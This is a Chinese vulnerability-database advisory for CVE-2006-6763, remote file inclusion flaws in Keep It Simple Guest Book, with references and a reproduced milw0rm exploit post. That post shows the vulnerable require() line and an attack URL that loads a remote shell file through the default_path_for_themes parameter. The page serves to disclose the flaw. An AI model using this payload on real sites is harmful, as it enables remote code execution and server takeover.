Keep It Simple Guest Book 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111827 漏洞类型 未知
发布时间 2006-12-22 更新时间 2006-12-26
CVE编号 CVE-2006-6763 CNNVD-ID CNNVD-200612-526
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2979
https://www.securityfocus.com/bid/87097
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-526
|漏洞详情
KeepItSimpleGuestBook(KISGB)存在多个PHP远程文件包含漏洞,远程攻击者可以通过在(a)authenticate.php内的(1)path_to_themes参数和在(b)admin.php和(c)upconfig.php内的default_path_for_themes参数中的URL来执行任意PHP代码。
|漏洞EXP
******************************************************************************************************
*KISGB (Keep It Simple Guest Book)* [default_path_for_themes] ******************* Remote File Include*
******************************************************************************************************
*******************************************
+class : Remote File Include Vulnerability*
+******************************************************************************************************************
+download link : http://phpnuke-downloads.com/modules.php?name=Downloads&d_op=ns_getit&cid=14&lid=156&type=url#get*
*******************************************************************************************************************
+Author : mdx
*
*****************************************************************************
+Files :								    *
+authenticate.php?                                                          *
**********************************************************************************
+code  :                                                                         *
+                                                                                *
+if (isset($default_path_for_themes)) require("$default_path_for_themes/$theme");*
+                                                                                *
*********************************************************************************************
+ Exploit  :                                                                                *
+********************************************************************************************+
+ http://www.site.***/[path]/authenticate.php?default_path_for_themes=http://mdxshell.txt?   +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
==============================================================================================
?                  Hi , The_bat_hacker , How are you ? ;=)                                   *
?                                                                                            *
? Thanks ; Cyber-WARRIOR TIM USERS, xoron , prohack ,leak , ozii , sakkure , abbad, dreamlord*
?                                                                                            *
?/////////////////////////////////////////////////////////////////////////////////////////////
?---------------------specials thanks  stroke ,SHiKaA----------------------------------------*
**********************************************************************************************
*******************                                                                          *
*******************                   KORKULARINIZ SADECE KABUSLARINIZDIR..		     *
*******************                                                                          *
*******************                        Turkish Hacker by mdx                             *
*******************                                                                          *
*******************                        Korkmak Kurtulmak Degildir.			     *
*******************                                                                          *
**********************************************************************************************


//////////////////////////////////////////////////////////////////////////////////////////////


Notes:

$sapi_name = strtolower(php_sapi_name());
if (strpos($sapi_name,"cgi")===FALSE) {
}
else {
	Vulnerable here.
	
So this is only vulnerable for CGI PHP versions.

/str0ke

# milw0rm.com [2006-12-22]
|受影响的产品
Keep It Simple Guest Book Keep It Simple Guest Book 5.0
|参考资料

来源:BUGTRAQ
名称:20061222Re:MultipleRemoteVulnerabilitiesinKISGB
链接:http://www.securityfocus.com/archive/1/archive/1/455198/100/0/threaded
来源:MISC
链接:http://www.security.nnov.ru/Pdocument470.html